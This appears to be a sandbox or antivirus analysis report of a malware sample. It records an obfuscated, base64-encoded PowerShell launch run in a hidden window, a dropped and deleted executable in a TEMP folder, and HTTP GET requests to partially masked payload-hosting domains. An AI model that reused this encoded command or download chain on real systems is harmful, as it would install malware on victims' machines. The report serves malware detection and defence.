Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIADkAeAB3AHYANAA3AD0AKAAnAFUAYgBmAGIANAAnACsAJwAzACcAKwAnADEAJwApADsALgAoACcAbgBlAHcALQBpACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAFYAOgBUAGUAbQBQAFwATwBmAEYAaQBDAGUAMgAwADEAOQAgAC0AaQB0AG...
Modifies file system
Creates the following files
- %TEMP%\office2019\cf7ygw.exe
Deletes the following files
- %TEMP%\office2019\cf7ygw.exe
Network activity
Connects to
- 'if###oves.net':80
TCP
HTTP GET requests
- http://co#####.dianevenzera.com/cgi-bin/u9lh_i_ivgw/
- http://ka##ii.com/dyy/0y_tej_x2wufq52a/
- http://pi######ghteambuilding.com/wp-includes/w_ne_nwof/
UDP
- DNS ASK fu###uggage.com
- DNS ASK co#####.dianevenzera.com
- DNS ASK ka##ii.com
- DNS ASK pi######ghteambuilding.com
- DNS ASK gv##tz.com
- DNS ASK if###oves.net
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIADkAeAB3AHYANAA3AD0AKAAnAFUAYgBmAGIANAAnACsAJwAzACcAKwAnADEAJwApADsALgAoACcAbgBlAHcALQBpACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAFYAOgBUAGUAbQBQAFwATwBmAEYAaQBDAGUAMgAwADEAOQAgAC0AaQB0AG...' (with hidden window)
